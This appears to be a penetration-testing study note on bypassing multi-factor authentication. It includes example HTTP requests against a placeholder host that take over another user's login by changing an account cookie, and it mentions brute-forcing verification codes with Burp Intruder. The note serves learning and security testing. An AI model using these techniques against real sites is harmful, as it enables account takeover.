handbook/tools/3.Web-Hacking/3.Business-Logic/Authentification-Vulnerability/Notes/2.Multi-factor-Authentication.md

56 lines
1.5 KiB
Markdown
Raw Normal View History

2024-08-30 23:07:22 +00:00
## Multi-Factor Authentication
Two-Factor Authentication Tokens
- Some websites send a verification code via a dedicated device or app (such as Google Authenticator)
- Other websites send a code via text message which is open to abuse
Code is being transmitted via SMS rather than by the device itself
Code can be intercepted via SIM swapping among other means
Bypassing Two-Factor Authentication
- Try to go to "logged in pages" without entering the code -- you might be able to bypass MFA completely Flawed Two-Factor Verification Logic
1. User logs in with normal creds
```
POST /login-steps/first
HTTP/1.1
Host: vulnerable-website.com
...
username=carlos&password=qwerty
```
2. User is assigned a cookie that relates to their account, before being taken to the second step of the login process
```
HTTP/1.1 200 OK
Set-Cookie: account=carlos
GET /login-steps/second
HTTP/1.1
Cookie: account=carlos
```
3. When submitting the verification code, the request uses this cookie to determine which account the user is trying to access
```
POST /login-steps/second
HTTP/1.1
Host: vulnerable-
website.com
Cookie: account=carlos
...
verification-code=123456
```
4. You can change the "account" cookie to any username when submitting the code
```
POST /login-steps/second
HTTP/1.1
Host: vulnerable-
website.com
Cookie: account=victim-user
...
verification-code=123456
```
Brute-forcing 2FA Verification Codes
- This can be automated by creating macros for Burp Intruder
- This can also be done with the Turbo Intruder extension